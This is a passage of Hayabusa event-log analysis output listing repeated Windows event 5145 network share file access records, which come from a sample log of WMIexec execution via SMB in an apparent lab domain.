Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 